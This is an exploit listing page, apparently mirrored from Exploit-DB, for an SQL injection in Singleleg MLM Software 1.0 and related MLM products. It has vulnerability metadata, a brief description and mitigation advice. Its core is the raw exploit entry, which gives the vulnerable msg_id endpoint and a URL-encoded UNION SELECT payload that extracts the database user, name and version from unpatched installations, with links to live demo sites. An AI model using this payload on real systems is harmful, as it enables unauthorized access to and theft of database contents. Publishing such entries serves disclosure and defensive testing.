Singleleg MLM Software 1.0 - 'msg_id' SQL Injection

vendor:

Singleleg MLM Software

by:

Ihsan Sencan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Singleleg MLM Software

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mlmsoftwarez.in:singleleg_mlm_software:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Singleleg MLM Software 1.0 – ‘msg_id’ SQL Injection

Singleleg MLM Software 1.0 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to access or modify data in the back-end database, compromise the application, access or elevate privileges, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow malicious SQL code to be executed. Parameterized queries should be used to ensure that user-supplied data is handled in a safe manner.

Source

Exploit-DB raw data:

# Exploit Title: Singleleg MLM Software 1.0 - 'msg_id' SQL Injection
# Dork: N/A
# Date: 2018-10-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://mlmsoftwarez.in/
# Software Link: http://mlmdemo.biz/singleleg/root.html
# Software Link: http://mlmdemo.biz/autopool/root.html
# Software Link: http://mlmdemo.biz/gift/root.html
# Software Link: http://mlmdemo.biz/investment/root.html
# Software Link: http://mlmdemo.biz/bidding/root.html
# Software Link: http://mlmdemo.biz/adclicking/root.html
# Software Link: http://mlmdemo.biz/repurchase/root.html
# Software Link: http://mlmdemo.biz/moneyorderplan/root.html
# Software Link: http://mlmdemo.biz/level/root.html
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# Affected Products: Singleleg MLM Software 1.0, Autopool MLM Software 1.0, Gift MLM Software 1.0
# Investmen MLM Software 1.0, Bidding MLM Software 1.0, ADD Clicking MLM Software 1.0
# Repurchase MLM Software 1.0, Moneyorder MLM Software 1.0, Level MLM Software 1.0
# CVE: N/A

# POC: 
# http://localhost/[PATH]/member/readmsg.php?msg_id=[SQL]

%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d